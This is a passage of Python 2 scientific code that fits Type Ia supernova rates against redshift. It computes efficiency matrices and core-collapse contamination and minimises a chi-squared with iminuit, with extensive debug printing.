histCC, binsX, binsY = np.histogram2d(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'].astype(int) != 1][ztype], self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'].astype(int) != 1]['MURES'], bins = (binsX, binsY))
fracContam = histCC.astype(np.float)/histTot.astype(np.float)
for fcRow, i in zip(fracContam, xrange(binsX.shape[0])):
for fc, j in zip(fcRow, xrange(binsY.shape[0])):
if fc < fracContamCut:
continue
else:
simInBin = (self.simcat.Catalog[ztype] > binsX[i]) & (self.simcat.Catalog[ztype] < binsX[i+1]) & (self.simcat.Catalog['MURES'] > binsY[j]) & (self.simcat.Catalog['MURES'] < binsY[j+1])
realInBin = (self.realcat.Catalog[ztype] > binsX[i]) & (self.realcat.Catalog[ztype] < binsX[i+1]) & (self.realcat.Catalog['MURES'] > binsY[j]) & (self.realcat.Catalog['MURES'] < binsY[j+1])
self.simcat.Catalog = self.simcat.Catalog[np.invert(simInBin)]
self.realcat.Catalog = self.realcat.Catalog[np.invert(realInBin)]
'''
zPHOTs = self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'].astype(int) == 1][self.ztype].astype(float)
zTRUEs = self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'].astype(int) == 1]['SIM_ZCMB'].astype(float)
self.typeString = self.typeString + 'A1'
print "Type Location A"
print "Choice A1"
print zPHOTs.shape
print zTRUEs.shape
print binList
counts, zPhotEdges, zTrueEdges, binnumber = scipy.stats.binned_statistic_2d(zPHOTs, zTRUEs, zTRUEs, statistic = 'count', bins = (self.binListFit, self.binListSamp))
assert(zPhotEdges.shape[0] == (self.nbinsFit + 1))
print "Type Location B"
print "Choice B1"
self.typeString = self.typeString + 'B1'
zGenHist, zGenBins = np.histogram(self.simgencat.Catalog[self.simgencat.Catalog['GENTYPE'].astype(int) == 1]['GENZ'].astype(float), bins = self.binListSamp)
#zSim1Hist, zSim1Bins = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'].astype(int) ==1]['SIM_ZCMB'].astype(float), bins = self.binListSamp)
print "counts of zTrue in each zPhot vs zTrue bin"
print counts.astype(int)
print "zGen Bins"
print zGenBins
print 'zGen Histogram'
print zGenHist
print "sum zGen events"
print np.sum(zGenHist)
print "sum zPhot events"
print np.sum(counts)
#print "DEBUG HERE"
#assert(0)
self.effmat = np.zeros((self.nbinsFit, self.nbinsSamp))
xMax = zPhotEdges.shape[0] - 2
yMax = zTrueEdges.shape[0] - 2
print zGenHist
print counts.astype(int)
'''
for zPhotLedge, zPhotRedge, row, i in zip(zPhotEdges[:-1], zPhotEdges[1:], counts, xrange(xMax + 1)):
zPhotCenter = (zPhotLedge + zPhotRedge)/2.0
for zTrueLedge, zTrueRedge, count, j in zip(zTrueEdges[:-1], zTrueEdges[1:], row, xrange(yMax + 1)):
zTrueCenter = (zTrueLedge + zTrueRedge)/2.0
inCell = (zPHOTs > zPhotLedge) & (zPHOTs < zPhotRedge) & (zTRUEs > zTrueLedge)& (zTRUEs < zTrueRedge)
zPhotCell = zPHOTs[inCell];zTrueCell = zTRUEs[inCell]
self.effmat[i][j] = count # np.sum(inCell)
#print "inCell"
#print np.sum(inCell)
#print "count"
#print count
#try:
# assert(np.abs(np.sum(inCell) - count) < 2)
#except:
# print "CHECK ABOVE"
for row, i in zip(self.effmat, xrange(self.effmat.shape[0])):
for j in xrange(row.shape[0]):
self.effmat[i][j] /= zGenHist[j]
'''
self.effmat = counts/zGenHist
#if simInd < self.nprint:
print 'effmat'
print self.effmat
extent = [zPhotEdges[0], zPhotEdges[-1], zTrueEdges[0], zTrueEdges[-1]]
if (simInd == 0) or (not ('sim' in self.realName.lower())):
plt.figure()
plt.imshow(np.flipud(counts.T), extent = extent, cmap = 'Blues')
plt.colorbar()
plt.savefig(self.realName + 'redshiftDistro.png')
plt.clf()
plt.close()
plt.figure()
plt.imshow(np.flipud(self.effmat.T), extent = extent, cmap = 'Blues', norm=mpl.colors.LogNorm())
plt.colorbar()
plt.savefig(self.realName + 'efficiencyMatrixLog.png')
plt.clf()
plt.close()
plt.figure()
plt.imshow(np.flipud(self.effmat.T), extent = extent, cmap = 'Blues')
plt.colorbar()
plt.savefig(self.realName + 'efficiencyMatrix.png')
plt.clf()
plt.close()
def fit_rate(self, fixK = False, fixBeta = False, simInd =100, trueBeta = 0, CCScale = 1.0, CCScaleErr = None, TrueCCScale = 1.0, BetaInit = 0.0, kInit = 1.0, BetaErr = 1, kErr = 1, f_Js = None, CCZbins = None, scaleZBins = None, Blind = False):
#import iminuit as iM
#from iminuit import Minuit as M
#import numpy as np
#import matplotlib as mpl
#import matplotlib.pyplot as plt
#if self.cheatZ:
# self.ztype = 'SIM_ZCMB'
#else:
# self.ztype = 'zPHOT'
plt.switch_backend('Agg')
if simInd < self.nprint:
print "Type Location C"
print "Choice C1"
if len(self.typeString) <= 4:
self.typeString = self.typeString + 'C1'
nSim, simBins = np.histogram(self.simgencat.Catalog[self.simgencat.Catalog['GENTYPE'].astype(int) == 1]['GENZ'].astype(float), bins=self.binListSamp)
if simInd < self.nprint:
print "nSim1"
print nSim
print self.simgencat.Catalog.shape
print "FIGURE OUT WHY YOU MADE THIS ASSERT STATEMENT LATER"
#assert(0)
nSim2, simBins2 = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'].astype(int) ==1][self.ztype].astype(float), bins=self.binListFit)
nSim3, simBins3 = np.histogram(self.simcat.Catalog[self.ztype].astype(float), bins=self.binListFit)
NCC , _ = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'] != 1][self.ztype].astype(float), bins=self.binListFit)
if self.fixCCScale:
print "Fix CC Scale at 1"
else:
if simInd < self.nprint:
print "nSim2"
print nSim2
print "nSim3"
print nSim3
print "nCC"
print NCC
OrigNCC = np.copy(NCC)
if self.cheatCCSub:
if self.cheatCCScale:
print "WARNING: Only cheating on CC Subtraction not scale"
print "Setting NCC to infinity to make sure that cheating correctly"
print "Diagnostics after this point may be nonsense"
print self.cheatCCSub
print "NCC BeforeFck"
print NCC
NCC = NCC*1E100
print "NCC AfterFck"
print NCC
elif self.cheatCCScale:
print "NCC Before1"
print NCC
print TrueCCScale
NCC = applyCCScale(NCC, TrueCCScale, CCScaleErr, zbins = CCZbins, datazbins = self.binListFit)
print "NCC After1"
print NCC
else:
print "NCC Before2"
print NCC
print CCScale
NCC = applyCCScale(NCC, CCScale, CCScaleErr, zbins = CCZbins, datazbins = self.binListFit)
print "NCC After2"
print NCC
#assert(0)
NIa , _ = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'] == 1][self.ztype].astype(float), bins=self.binListFit)
'''
DebugNIaPhot, _ = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'] == 1]['zPHOT'].astype(float), bins=self.binListFit)
DebugNCCPhot, _ = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'] != 1]['zPHOT'].astype(float), bins=self.binListFit)
DebugNCCPhot = applyCCScale(DebugNCCPhot, CCScale, CCScaleErr, zbins = scaleZBins, datazbins = self.binListFit)
DebugNIaTrue, _ = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'] == 1]['SIM_ZCMB'].astype(float), bins=self.binListSamp)
DebugNCCTrue, _ = np.histogram(self.simcat.Catalog[self.simcat.Catalog['SIM_TYPE_INDEX'] != 1]['SIM_ZCMB'].astype(float), bins=self.binListSamp)
DebugNCCTrue = applyCCScale(DebugNCCTrue, CCScale, CCScaleErr, zbins = scaleZBins, datazbins = self.binListSamp)
uselessCtr = 0
for niap, nccp, niat, ncct, zp, zt in zip(DebugNIaPhot, DebugNCCPhot, DebugNIaTrue, DebugNCCTrue,(self.binListFit[1:] + self.binListFit[:-1])/2.0, (self.binListSamp[1:] + self.binListSamp[:-1])/2.0 ):
uselessCtr +=1
self.globalZTrueBinStorage.append(zt)
self.globalZPhotBinStorage.append(zp)
self.globalNDataIaPhotBinStorage.append(niap)
self.globalNDataCCPhotBinStorage.append(nccp)
self.globalNDataIaTrueBinStorage.append(niat)
self.globalNDataCCTrueBinStorage.append(ncct)
print "UselessCtr"
print uselessCtr
'''
try:
TrueNCC, _ = np.histogram(self.realcat.Catalog[self.realcat.Catalog['SIM_TYPE_INDEX'] !=1][self.ztype].astype(float), bins=self.binListFit)
if simInd < self.nprint:
print "True NCC Data"
print TrueNCC
except:
print "Using real data"
TrueNCC = 0.0
nData, dataBins = np.histogram(self.realcat.Catalog[self.ztype].astype(float), bins=self.binListFit)
print "nData"
print nData
if not(self.cheatCCSub):
FracBad = NCC*1.0/(1.0*(NCC+NIa))
nCCData = nData*FracBad
else:
nCCData = TrueNCC*1.0
FracBad = TrueNCC*1.0/nData
if simInd < self.nprint:
print "PreScale NCC/nSim"
print OrigNCC*1.0/(OrigNCC+NIa)
print "PreScale Pred NCC Data"
print OrigNCC*1.0/(OrigNCC+NIa)*nData
print "PreScale Pred NCC Data if 2NCC"
print OrigNCC*2.0/(2.0*OrigNCC+NIa)*nData
print "TrueNCC"
print TrueNCC
if type(TrueNCC) != int:
if simInd < self.nprint:
print "PreScale PredNCCData - TrueNCCData"
print OrigNCC*2.0/(2.0*OrigNCC+NIa)*nData - TrueNCC
print "PreScale PredNCCData - TrueNCCData/ PredNCCData"
print (OrigNCC*2.0/(2.0*OrigNCC+NIa)*nData - TrueNCC)/(OrigNCC*2.0/(2.0*OrigNCC+NIa)*nData)
else:
print "Using real data"
print "Mean of PreScale PredNCCData - TrueNCCData/ PredNCCData"
print np.nanmean((OrigNCC*2.0/(2.0*OrigNCC+NIa)*nData - TrueNCC)/(OrigNCC*2.0/(2.0*OrigNCC+NIa)*nData))
print "PostScale NCC/nData"
print NCC*1.0/(NCC+NIa)
if simInd < self.nprint:
print "Fraction of CCs in each bin"
print FracBad
print 'NCC'
print NCC
print 'nSim2'
print nSim2
print "nData, dataBins, realcat shape pre contam correction"
print nData
print dataBins
print np.sum(self.realcat.Catalog[self.ztype].astype(float) > self.zmaxFit)
print np.sum(self.realcat.Catalog[self.ztype].astype(float) < self.zminFit)
print self.realcat.Catalog[self.ztype].shape
print "Ratio nData/nSim"
print 1.0*nData/(1.0*nSim3)
print "Ratio nSim2/nData"
print 1.0*nSim3/(1.0*nData)
print "FracBad"
print FracBad
print 'NCCData'
print nCCData
if simInd < self.nprint:
print "overall Contam"
print np.sum(NCC)*1.0/(np.sum(nSim3)*1.0)
def chi2func(nData, nSim, effmat, fnorm, zCentersSamp, zCentersFit, k = 1.0, Beta = 0.0, zBreak = 1.0, dump = False, complexdump = False, modelError = False, nIA = None, nCC = None, Rate_Model = 'powerlaw', zbins = None, simInd = 100, BetaPrior = (-3, 3), KPrior = (0.0, 50.0), priorRate = None, priorZEff = None, ratePriorErrUp = None, ratePriorErrDown =None, ratePriorErrAll = None, TrueNCCData = None, f_1 = 1.0, f_2 = 1.0, f_3 = 1.0, f_4 = 1.0, f_5 = 1.0, f_6 = 1.0, f_7 = 1.0, f_8 = 1.0, f_9 = 1.0, f_10 = 1.0, f_11 = 1.0):
if simInd < self.nprint:
print "PRIORS2"
print priorRate
print priorZEff
print ratePriorErrUp
print ratePriorErrDown
Chi2Temp = 0.0
if Rate_Model == 'powerlaw':
f_Js = k*(1+zCentersSamp)**Beta
elif Rate_Model == 'discrete':
f_Js = np.array([f_1, f_2, f_3, f_4, f_5, f_6, f_7, f_8, f_9, f_10, f_11])
elif (Rate_Model == 'brokenpowerlaw') | (Rate_Model == 'brokenpowerlawVar'):
f_Js = []
#zCenters = (zbins[1:]+zbins[:-1])/2.0
temp = None
for zC in zCentersSamp:
if zC < zBreak:
f_Js.append(k*(1+zC)**Beta)
elif not(temp is None):
f_Js.append(temp)
else:
temp = f_Js[-1]
f_Js.append(temp)
f_Js = np.array(f_Js)
else:
assert(0)
if simInd < self.nprint:
if Rate_Model == 'discrete':
print "f_Js init"
print f_Js
else:
print "Beta init"
print Beta
print "k init"
print k
#chi2Mat = np.zeros((self.nbinsFit))
#adjNMC = np.zeros((self.nbinsFit))
if Rate_Model == 'discrete':
kprior = 0
betaprior = 0
else:
kprior = weakPrior(k, KPrior)
betaprior = weakPrior(Beta, BetaPrior)
if dump and (self.nprint > simInd):
print "kprior"
print kprior
print "betaprior"
print betaprior
if (nIA is None) or (nCC is None):
if dump:
print "No CC Cut"
fracCCData = np.zeros(nData.shape)
elif self.cheatCCSub:
fracCCData = TrueNCC*1.0/nData
else:
if Rate_Model == 'discrete':
if dump and (self.nprint > simInd):
print 'f_J adjusted CC Cut'
print Rate_Model
print nCC
print nIA
print np.array(f_Js)
fracCCData = (nCC*1.0)/((1.0*nCC + nIA*np.array(f_Js)))
print fracCCData
else:
if dump and (self.nprint > simInd):
print "Beta Adjusted CC Cut"
print Rate_Model
#BetaRatio = k*(1+zCenters)**(Beta)#/(1+zCenters)**MCBeta
BetaRatio = (1+zCentersFit)**(Beta)#/(1+zCenters)**MCBeta
if dump and (self.nprint > simInd):
print "Beta Ratio"
print BetaRatio
print "BadFracCCData"
print (nCC*1.0)/((1.0*nCC + nIA*BetaRatio))
print "bad NCCData"
print (nCC*1.0)/((1.0*nCC + nIA*BetaRatio))*nData
fracCCData = (nCC*1.0)/((1.0*nCC + nIA*BetaRatio))
if dump and (self.nprint > simInd):
print 'abc'
print "fracCCData2"
print fracCCData
print "unscaled fracCCData"
print (1.0*nCC)/(1.0*(nCC+nIA))
if self.cheatCCSub:
nCCData = TrueNCCData
if dump and (self.nprint < simInd):
print "Cheating CC Sub"
assert(not(TrueNCCData is None))
elif dump and (self.nprint > simInd):
print 'def'
print "Normal CC Sub"
if not self.cheatCCSub:
nCCData = nData*fracCCData
if dump and (self.nprint > simInd):
print "nCCData2"
print nCCData
if not(TrueNCCData is None):
print "TrueNCCData"
print TrueNCCData
#print f_Js
#Check if I am scaling errors down with increasing MC size. Make MC twice as large as "Data" to test.
if dump: chi2Storage = []
if dump: scaledNSimStor = []
if dump: JSumTempNumStor = []
if dump: JSumTempDenStor = []
if dump:
print "actually used NCC"
#print nCC
print nCCData
if dump and (simInd < self.nprint):
print "effmat"
print effmat
print "nData"
print nData
print "nCCData"
print nCCData
print "nSim"
print nSim
print nCCData
for row, nDataI, nCCDataI, i, zc in zip(effmat, nData, nCCData, range(self.nbinsFit), zCentersFit):
if dump and (self.nprint > simInd):
print 'effmat row'
print row
print 'nDataI'
print nDataI
print 'nCCDataI'
print nCCDataI
scaledNSimTemp = 0.0
JSumTempNum = 0.0
JSumTempDen = 0.0
if dump and (simInd < self.nprint):
print "nBinsSamp"
print self.nbinsSamp
assert(row.shape[0] == self.nbinsSamp)
assert(nSim.shape[0] == self.nbinsSamp)
assert(len(f_Js) == self.nbinsSamp)
for eff, nSimJ, f_J, j in zip(row, nSim, f_Js, range(self.nbinsSamp)):
if dump and (self.nprint > simInd):
print 'NGen J'
print nSimJ
print 'JSumTempNum contr'
print nSimJ*f_J*eff*fnorm
print 'JSumTempDen contr'
print nSimJ*f_J*eff*fnorm*f_J*fnorm
#if dump and (i != j) and self.cheatZ and (self.nprint < simInd):
# if nSimJ*f_J*eff*fnorm > 0:
# print " This should be zero but isnt "
# print nSimJ*f_J*eff*fnorm
# assert(0)
JSumTempNum += nSimJ*f_J*eff*fnorm
JSumTempDen += nSimJ*f_J*eff*fnorm*f_J*fnorm
dataFunc = np.maximum(nDataI ,1)
#CCFunc = np.ceil(np.maximum(nCCDataI, 1))
CCFunc = np.maximum(nCCDataI, 1)
c2t = (nDataI - nCCDataI - JSumTempNum)**2/( dataFunc + CCFunc + JSumTempDen)
if dump:
JSumTempNumStor.append(JSumTempNum)
JSumTempDenStor.append(JSumTempDen)
if dump and (self.nprint > simInd):
print i
print 'nDataI'
print nDataI
print 'fnCCDataI'
print nCCDataI
print 'fnorm'
print fnorm
print "JSumTempNum tot"
print JSumTempNum
print "JSumTempDen tot"
print JSumTempDen
print "Chi2Bin"
print c2t
if dump:
chi2Storage.append(c2t)
if c2t > 5:
print 'INSANITY CHECK ABOVE'
# Chi2Temp += ((nDataI - nCCDataI - JSumTempNum)**2/(JSumTempNum + JSumTempDen))#*fnorm**2
if nDataI > 1E-11 or JSumTempDen > 1E-11:
Chi2Temp += c2t
if dump and (self.nprint > simInd):
print "JSumTempNum/Den"
print JSumTempNumStor
print JSumTempDenStor
if dump:
if (self.nprint >simInd):
print Chi2Temp
print kprior
print betaprior
print chi2Storage
print "nData"
print nData
print "nCCData"
print nCCData
if priorRate is None:
return Chi2Temp+kprior+betaprior , chi2Storage
else:
print "PRIORS3"
print priorRate
print "fit k"
print k
print 'MCK'
print self.MCK
print "fit beta"
print Beta
print 'MCBeta'
print self.MCBeta
print ratePrior(k*self.MCK, Beta + self.MCBeta, priorRate, priorZEff, ratePriorErrUp, ratePriorErrDown, ratePriorErrAll)
return Chi2Temp+kprior+betaprior + ratePrior(k*self.MCK, Beta+self.MCBeta, priorRate, priorZEff, ratePriorErrUp, ratePriorErrDown, ratePriorErrAll), chi2Storage
else:
if dump and (self.nprint > simInd):
print 'C2T'
print Chi2Temp
print kprior
print betaprior
if priorRate is None:
return Chi2Temp+kprior+betaprior
else:
print "PRIORS3"
print priorRate
print "fit k"
print k
print 'MCK'
print self.MCK
print "fit beta"
print Beta
print 'MCBeta'
print self.MCBeta
print ratePrior(k*self.MCK, Beta+self.MCBeta, priorRate, priorZEff, ratePriorErrUp, ratePriorErrDown, ratePriorErrAll)
return Chi2Temp+kprior+betaprior + ratePrior(k*self.MCK, Beta+self.MCBeta, priorRate, priorZEff, ratePriorErrUp, ratePriorErrDown, ratePriorErrAll)
zCentersSamp = (self.binListSamp[1:] + self.binListSamp[:-1])/2.0
zCentersFit = (self.binListFit[1:] + self.binListFit[:-1])/2.0
#Is this right? Everything else in the other side of the chi2 function should be Ia only
if self.cheatCCSub:
self.fracCCData = TrueNCC*1.0/nData
else:
self.fracCCData = (NCC*1.0)/(1.0*(NCC + NIa))
if (self.nprint > simInd):
print "nSim"
print nSim
print 'fracCCData'
print self.fracCCData
print "nData"
print nData
#fnorm = float(np.sum(nData*(1-self.fracCCData)))/float(np.sum(nSim))
fnorm = 1.0/240.0
#print "PRIORS"
#print self.priorZEff
#print self.priorRate
#print self.ratePriorErrUp
#print self.ratePriorErrDown
if self.Rate_Model == 'powerlaw':
lamChi2 = lambda k, Beta: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, k, Beta, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit)
lamChi2Dump = lambda k, Beta: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, k, Beta, dump = True, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit)
MinObj = M(lamChi2, k = kInit, error_k = kErr , Beta = BetaInit, error_Beta = BetaErr, limit_k = (0.0, None), limit_Beta = (-100, 100), fix_k = fixK, fix_Beta = fixBeta)
c2i, _ = lamChi2Dump(1.0, 0.0)
print "Chi2 init = {0}".format(round(c2i, 4))
elif self.Rate_Model == 'brokenpowerlaw':
lamChi2 = lambda k, Beta: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, k, Beta, 1.0, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, Rate_Model = 'brokenpowerlaw', priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit)
lamChi2Dump = lambda k, Beta: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, k, Beta, 1.0, dump = True, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, Rate_Model = 'brokenpowerlaw', priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit)
MinObj = M(lamChi2, k = kInit, error_k = kErr , Beta = BetaInit, error_Beta = BetaErr, limit_k = (0.0, None), limit_Beta = (-100, 100), fix_k = fixK, fix_Beta = fixBeta)
c2i, _ = lamChi2Dump(1.0, 0.0)
print "Chi2 init = {0}".format(round(c2i, 4))
elif self.Rate_Model == 'brokenpowerlawVar':
lamChi2 = lambda k, Beta, zBreak: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, k, Beta, zBreak, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, Rate_Model = 'brokenpowerlawVar', priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit)
lamChi2Dump = lambda k, Beta, zBreak: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, k, Beta, zBreak, dump = True, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, Rate_Model = 'brokenpowerlawVar', priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit)
MinObj = M(lamChi2, k = kInit, error_k = kErr , Beta = BetaInit, error_Beta = BetaErr, limit_k = (0.0, None), limit_Beta = (-100, 100), fix_k = fixK, fix_Beta = fixBeta, zBreak = 1.0, error_zBreak = 0.1, limit_zBreak = (self.zminFit, self.zmaxFit))
c2i, _ = lamChi2Dump(1.0, 0.0)
print "Chi2 init = {0}".format(round(c2i, 4))
elif self.Rate_Model == 'discrete':
lamChi2 = lambda f_1, f_2, f_3, f_4, f_5, f_6, f_7, f_8, f_9, f_10, f_11: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, 1.0, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, f_1 = f_1, f_2 = f_2,f_3 = f_3, f_4 = f_4,f_5 = f_5, f_6 = f_6,f_7 = f_7, f_8 = f_8,f_9 = f_9, f_10 = f_10, f_11 = f_11, Rate_Model = 'discrete', priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit )
lamChi2Dump = lambda f_1, f_2, f_3, f_4, f_5, f_6, f_7, f_8, f_9, f_10, f_11: chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, 1.0, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC, f_1 = f_1, f_2 = f_2,f_3 = f_3, f_4 = f_4,f_5 = f_5, f_6 = f_6,f_7 = f_7, f_8 = f_8,f_9 = f_9, f_10 = f_10, f_11 = f_11, dump = True, Rate_Model = 'discrete', priorRate = self.priorRate, priorZEff = self.priorZEff, ratePriorErrUp = self.ratePriorErrUp, ratePriorErrDown =self.ratePriorErrDown, ratePriorErrAll = self.ratePriorErrAll)#, zbins = self.binListFit)
c2i, _ = lamChi2Dump(1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0)
print "Chi2 init = {0}".format(round(c2i, 4))
MinObj = M(lamChi2, f_1 = 1.0, error_f_1 = 1.0, limit_f_1 = (0.0, None), f_2 = 1.0, error_f_2 = 1.0, limit_f_2 = (0.0, None), f_3 = 1.0, error_f_3 = 1.0, limit_f_3 = (0.0, None), f_4 = 1.0, error_f_4 = 1.0, limit_f_4 = (0.0, None), f_5 = 1.0, error_f_5 = 1.0, limit_f_5 = (0.0, None), f_6 = 1.0, error_f_6 = 1.0, limit_f_6 = (0.0, None), f_7 = 1.0, error_f_7 = 1.0, limit_f_7 = (0.0, None), f_8 = 1.0, error_f_8 = 1.0, limit_f_8 = (0.0, None), f_9 = 1.0, error_f_9 = 1.0, limit_f_9 = (0.0, None), f_10 = 1.0, error_f_10 = 1.0, limit_f_10 = (0.0, None), f_11 = 1.0,error_f_11 = 1.0, limit_f_11 = (0.0, None))
if self.Rate_Model == 'discrete':
c2f, c2stor = lamChi2Dump(MinObj.values['f_1'],MinObj.values['f_2'],MinObj.values['f_3'],MinObj.values['f_4'],MinObj.values['f_5'],MinObj.values['f_6'],MinObj.values['f_7'],MinObj.values['f_8'],MinObj.values['f_9'],MinObj.values['f_10'],MinObj.values['f_11'])
else:
print "TEST DUMP HERE"
c2f, c2stor = lamChi2Dump(MinObj.values['k'], MinObj.values['Beta'])
#MinObj = M(lamChi2, k = 1.0, fix_k = True, Beta = 0.0, error_Beta = 0.1)
MinObj.set_strategy(2)
fmin, param = MinObj.migrad(nsplit= 10)
#fmin, param = MinObj.migrad()
#ErrDict = MinObj.minos()
self.covar = MinObj.np_covariance()
ErrDict = MinObj.minos(maxcall = 1000)
#plt.scatter(nData, c2stor)
#plt.xlabel('nData')
#plt.ylabel('chi2 in bin')
#plt.savefig(self.realName + 'Chi2VsnData.png')
#plt.clf()
if self.nprint > simInd:
print "Shapes of things"
print len(c2stor)
print nData.shape
print dataBins.shape
print self.binListFit.shape
print self.binListSamp.shape
#print DebugNIaPhot.shape
#print DebugNCCPhot.shape
#print DebugNIaTrue.shape
#print DebugNCCTrue.shape
for c2, nd in zip(c2stor, nData):
self.globalChi2Storage.append(c2)
self.globalNDataStorage.append(nd)
if self.Rate_Model == 'discrete':
fJList = [MinObj.values['f_1'],MinObj.values['f_2'],MinObj.values['f_3'],MinObj.values['f_4'],MinObj.values['f_5'],MinObj.values['f_6'],MinObj.values['f_7'],MinObj.values['f_8'],MinObj.values['f_9'],MinObj.values['f_10'],MinObj.values['f_11']]
fJErrList = [MinObj.errors['f_1'],MinObj.errors['f_2'],MinObj.errors['f_3'],MinObj.errors['f_4'],MinObj.errors['f_5'],MinObj.errors['f_6'],MinObj.errors['f_7'],MinObj.errors['f_8'],MinObj.errors['f_9'],MinObj.errors['f_10'],MinObj.errors['f_11']]
self.fJList = fJList
self.fJErrList = fJErrList
self.Beta = None
self.k = None
self.kErr = None
self.BetaErr = None
print fJList
print fJErrList
else:
k = MinObj.values['k']
#kErr = MinObj.errors['k']
kErr = (np.abs(ErrDict['k']['lower']) + np.abs(ErrDict['k']['upper']))/2.0
Beta = MinObj.values['Beta']
#BetaErr = MinObj.errors['Beta']
BetaErr = (np.abs(ErrDict['Beta']['lower']) + np.abs(ErrDict['Beta']['upper']))/2.0
if self.Rate_Model == 'brokenpowerlawVar':
zBreak = MinObj.values['zBreak']
zBreakErr = MinObj.values['zBreakErr']
self.k = k
self.Beta = Beta
self.kErr = kErr
self.BetaErr = BetaErr
#/(self.nbins - 2)
self.BetaRatio = (1+zCentersFit)**(Beta)
self.fJList = None
print 'SCALE DEBUG'
print NCC
print NIa
print self.BetaRatio
print 'SCALE DEBUG2'
print np.sum(NCC)
print np.sum(NIa)
print np.sum(NIa*self.BetaRatio)
self.fracCCData = (NCC*1.0)/(1.0*(1.0*NCC + NIa*self.BetaRatio))
self.fracCCDataTot = (np.sum(NCC)*1.0)/(1.0*(1.0*np.sum(NCC) + np.sum(NIa*self.BetaRatio)))
print 'SCALE DEBUG3'
print self.fracCCData
print self.fracCCDataTot
print 'SCALE DEBUG4'
print OrigNCC
print np.sum(OrigNCC)
print CCScale
#print self.fracCCDataTot
#print type(self.fracCCDataTot)
#assert(type(self.fracCCDataTot) == float)
print "Chi2 final = {0}".format(round(lamChi2Dump(self.k, self.Beta)[0], 4))
self.chi2 = fmin.fval
print "Chi2final? = {0}".format(round(fmin.fval, 4))
if not(self.priorRate is None):
ratePriorFinalVal = ratePrior(self.k*self.MCK, self.Beta+self.MCBeta, self.priorRate, self.priorZEff, self.ratePriorErrUp, self.ratePriorErrDown, self.ratePriorErrAll )
c2NoPrior = chi2func(nData, nSim, self.effmat, fnorm, zCentersSamp, zCentersFit, self.k, self.Beta, dump = False, nIA = NIa, nCC = NCC, simInd =simInd, TrueNCCData = TrueNCC)
print "RATE PRIOR FINAL"
print ratePriorFinalVal
print "Chi2final? = {0}".format(round(fmin.fval, 4))
print "Chi2FinalNoPrior"
print c2NoPrior
#fJs = np.ones(zCenters.shape)
'''
try:
if (Rate_Model != 'discrete'):
plt.clf()
MinObj.draw_contour('k','Beta', nsigma=3)
plt.savefig('{0}_{1}_k_beta_contour.png'.format(self.realName, self.simName))
if Blind:
locs, labels = plt.xticks()
labels = locs + np.cos(cosVal)
plt.xticks(labels)
locs, labels = plt.yticks()
labels = locs + np.cos(cosVal)
plt.yticks(labels)
plt.clf()
#xgrid,ygrid, sigma, rawdata = MinObj.mncontour_grid('k', 'Beta', numpoints=30, sigma_res = 1, nsigma = 2.0)
#fig, ax = plt.subplots(1)
#plt.clf()
#CS = ax.contour(xgrid, ygrid + self.MCBeta, sigma, levels = [ 1.0, 2.0])
#ax.clabel(CS, fontsize=7, inline=1)
#ax.set_xlabel('k')
#ax.set_ylabel('Beta')
#if Blind:
# ax.set_xticklabels([])
# ax.set_yticklabels([])
#plt.savefig('{0}_{1}_k_beta_contour.png'.format(self.realName, self.simName))
